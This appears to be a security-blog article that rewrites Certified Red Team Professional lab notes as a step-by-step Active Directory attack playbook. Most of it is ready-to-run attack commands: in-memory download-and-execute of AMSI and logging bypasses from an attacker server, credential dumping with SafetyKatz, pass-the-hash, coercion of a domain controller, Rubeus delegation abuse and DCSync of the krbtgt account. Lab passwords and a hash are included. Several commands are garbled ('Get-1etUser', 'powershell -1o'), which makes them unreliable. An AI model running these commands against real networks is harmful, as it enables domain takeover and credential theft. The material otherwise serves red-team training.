CRTP Notes Exposed: The Ultimate Red Team Playbook for Active Directory Domination + Video

Listen to this Post

Featured Image

Introduction:

The Certified Red Team Professional (CRTP) certification, offered by Altered Security, has emerged as the gold standard for hands-on Active Directory (AD) security training. Unlike traditional certifications that rely on outdated exploits, CRTP focuses on abusing legitimate Active Directory features and misconfigurations in fully patched environments—with Microsoft Defender enabled on every host. This article extracts the raw technical essence from real CRTP lab notes, delivering a comprehensive guide to the attack chains, privilege escalation vectors, and living-off-the-land techniques that separate novice pentesters from seasoned red teamers.

Learning Objectives:

  • Master the “Assume Breach” methodology, starting from a low-privileged domain user account
  • Execute advanced Active Directory attacks including Kerberoasting, AS-REP Roasting, and delegation abuse
  • Bypass modern defenses like AMSI, Enhanced Script Block Logging, and Windows Defender using native Windows tools

You Should Know:

  1. Establishing the Beachhead: Initial Access & Defense Evasion

The CRTP lab operates under an “Assume Breach” model—you begin with credentials for a low-privileged domain user. In the provided notes, the initial foothold uses the account `student352` with password fdbKG8gLZx69GgUH. The first critical step is establishing access via WinRM or RDP:

 WinRM access using evil-winrm (Linux)
evil-winrm -i 172.16.100.52 -u student352 -p 'fdbKG8gLZx69GgUH'

RDP access using xfreerdp
xfreerdp3 /v:172.16.100.52 /u:'dcorp\student352' /p:'fdbKG8gLZx69GgUH' /drive:tools,/home/kali/Tools/CRTP /cert:ignore

Bypassing AMSI and Script Block Logging

Modern Windows environments have AMSI (Anti-Malware Scan Interface) and PowerShell Script Block Logging enabled by default. The notes reveal two essential bypasses:

 Bypass Enhanced Script Block Logging
iex (New-Object System.NET.WebClient).DownloadString('http://172.16.100.52/sbloggingbypass.txt')

Bypass AMSI
iex (New-Object System.NET.WebClient).DownloadString('http://172.16.100.52/Amsi-Byp.txt')

These in-memory downloads load bypass scripts directly from an attacker-controlled server without touching disk, evading signature-based detection.

2. Enumeration: The Foundation of All Attacks

Thorough enumeration is non-1egotiable. The notes emphasize using PowerView.ps1—a PowerShell tool for AD reconnaissance—loaded via:

iex (New-Object System.NET.WebClient).DownloadString('http://172.16.100.52/PowerView.ps1')

Key enumeration commands:

 Enumerate domain users
Get-1etUser | select samaccountname

Find local admin access
Find-LocalAdminAccess

Enumerate domain groups and memberships
Get-1etGroup -GroupName "Domain Admins" | Get-1etGroupMember

Enumerate SPNs for Kerberoasting
Get-1etUser -SPN

Enumerate ACLs and interesting permissions
Get-ObjectAcl -SamAccountName "target_user" | select AceType, ActiveDirectoryRights

BloodHound is also critical for visualizing attack paths. The notes mention performing “Bloodhound self-enumeration” from the `student352` account to map the domain structure and identify privilege escalation opportunities.

3. Privilege Escalation: From RDPUser to Domain Admin

The notes document a clear privilege escalation chain:

Step 1: Identify Local Admin Rights

The `student352` account belongs to the RDPUsers group, which has local administrator access to dcorp-adminsrv—a critical finding that enables lateral movement.

Step 2: Bypass AppLocker

AppLocker restricts execution to specific folders. The solution? Run scripts from `C:\Program Files` (a trusted location) or use the `RunWithRegistryNonAdmin.bat` script from the `C:\AD\Tools\InviShell` directory to launch an invisible PowerShell session.

Step 3: Dump Credentials with SafetyKatz

Using `Loader.exe` to execute SafetyKatz (a minimized version of Mimikatz) in memory:

 Transfer Loader.exe
powershell -1o -Command "Invoke-WebRequest -Uri 'http://172.16.100.52/Loader.exe' -OutFile 'C:\Users\Public\Loader.exe'"

Dump keys and vault
cmd /c C:\Users\Public\Loader.exe -path http://127.0.0.1:8888/SafetyKatz.exe sekurlsa::evasive-keys exit

This dumps Kerberos keys and credential vaults. The notes show that srvadmin credentials were obtained from this dump, which then provided access to dcorp-mgmt. Further dumps from `dcorp-mgmt` yielded svcadmin credentials, ultimately granting access to the domain controller dcorp-dc.

Step 4: OverPass-The-Hash

With the NTLM hash of a Domain Admin, execute an OverPass-the-Hash attack:

C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe "sekurlsa::evasive-pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:cmd.exe" "exit"

4. Unconstrained Delegation Abuse with WSPCoerce

Unconstrained delegation is a critical misconfiguration. When a computer with unconstrained delegation authenticates to any service, it caches the user’s TGT, allowing an attacker to impersonate that user.

The notes mention that `dcorp-appsrv` has unconstrained delegation enabled. The attack uses WSPCoerce to coerce the domain controller (dcorp-dc) to authenticate to the compromised server:

 Compile WSPCoerce on Windows
c:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe WSPCoerce.cs

Run coercion (target: dcorp-dc, listener: dcorp-appsrv)
WSPCoerce.exe dcorp-dc dcorp-appsrv

The domain controller’s machine account authenticates over SMB, and because `dcorp-appsrv` has unconstrained delegation, the TGT for the DC is captured. This TGT can then be used to impersonate the domain controller and perform DCSync to extract the `krbtgt` hash, compromising the entire domain.

 DCSync using mimikatz
lsadump::dcsync /domain:dcorp.local /user:krbtgt

5. Constrained Delegation & S4U Attacks

Constrained delegation restricts which services a user or computer can delegate to. However, attackers can abuse S4U2Self and S4U2Proxy to impersonate any user to the allowed service.

The notes indicate that `dcorp-adminsrv` is configured with constrained delegation (AllowedToDelegate) to dcorp-dc. Using a S4U attack with `http` or altservice, attackers can obtain a service ticket for the domain controller as a Domain Admin:

 Using Rubeus for S4U attack
Rubeus.exe s4u /user:dcorp-adminsrv$ /rc4:<hash> /impersonateuser:Administrator /msdsspn:host/dcorp-dc.dcorp.local /altservice:http /ptt

This generates a service ticket for the domain controller, granting WinRM or RDP access. The notes confirm that this technique successfully retrieved appadmin credentials, who is local admin on dcorp-appsrv—closing the loop for complete domain compromise.

6. Tool Transfer and Port Forwarding

Transferring tools between machines is essential. The notes demonstrate multiple methods:

Python HTTP Server (Linux attacker machine):

python3 -m http.server 8000

Downloading tools from Windows:

 Using Invoke-WebRequest
iwr -Uri "http://172.16.99.52:8000/sharpshares.exe" -OutFile "C:\AD\Tools\sharpshares.exe"

Port Forwarding with Netsh:

To access internal services, set up a port proxy:

netsh interface portproxy add v4tov4 listenport=8888 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.52

This forwards traffic from port 8888 on the compromised host to port 80 on the target (172.16.100.52), enabling tools like SafetyKatz to reach internal resources.

7. Cross-Domain Attacks: Forest Trusts

The lab environment includes multiple domains (dcorp and mcorp). After compromising dcorp, the notes show that attackers coerced `mcorp-dc` and performed DCSync on the parent domain. This demonstrates the critical nature of forest trusts—a compromise in one domain can cascade to others through trust relationships.

 After obtaining Enterprise Admin privileges, DCSync the parent domain
lsadump::dcsync /domain:mcorp.local /user:krbtgt

What Undercode Say:

  • Key Takeaway 1: The CRTP exam isn’t about exploiting CVEs—it’s about abusing legitimate Active Directory features and misconfigurations. Every attack chain documented relies on feature abuse, not unpatched vulnerabilities.

  • Key Takeaway 2: Defense evasion is paramount. AMSI bypasses, Script Block Logging bypasses, and living-off-the-land techniques (using only native Windows tools like PowerShell and .NET) are essential skills for any red teamer.

Analysis: The CRTP notes reveal a systematic, repeatable methodology for compromising Active Directory environments. Starting from a low-privileged user, the attacker enumerates relentlessly, identifies delegation misconfigurations, and escalates through a chain of credential theft and lateral movement. The use of `Loader.exe` and in-memory execution of tools like SafetyKatz and Rubeus highlights the importance of operational security and evasion. What’s particularly striking is that every step uses built-in Windows features or legitimate administrative tools—there’s no “malware” in the traditional sense. This is pure tradecraft. The inclusion of cross-domain attacks (moving from `dcorp` to mcorp) underscores that modern enterprises with multiple forests and trust relationships are at significant risk. Organizations must audit delegation configurations, enforce least privilege, and implement robust logging to detect these TTPs.

Prediction:

  • -1 The widespread adoption of CRTP-style training will inevitably lead to a surge in sophisticated AD attacks as more security professionals gain these offensive skills. Defenders must accelerate their detection capabilities.

  • +1 However, this same training empowers blue teams to think like attackers. Organizations that invest in both CRTP for red teams and defensive training will build more resilient Active Directory environments.

  • -1 Microsoft’s continuous improvements to Defender and AMSI will force attackers to evolve their bypass techniques, creating an ongoing arms race that benefits vendors but increases operational complexity for security teams.

  • +1 The CRTP methodology’s emphasis on “living off the land” will drive a shift toward identity-centric security models, where monitoring authentication patterns becomes more critical than signature-based detection.

  • -1 Small and medium enterprises without dedicated security teams remain extremely vulnerable—they lack the resources to audit delegation, monitor for S4U abuses, or respond to credential dumping attacks.

  • +1 As CRTP and similar certifications become more accessible, the overall skill level of the cybersecurity workforce will rise, potentially closing the massive skill gap in Active Directory security.

  • -1 The 24-hour exam format may incentivize speed over thoroughness, potentially leading to credentialed professionals who can compromise environments but lack deep understanding of the underlying Kerberos protocols and Windows security architecture.

▶️ Related Video (84% Match):

https://www.youtube.com/watch?v=-X1vf69CxCA

🎯Let’s Practice For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

IT/Security Reporter URL:

Reported By: Deepmarketer Crtp – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky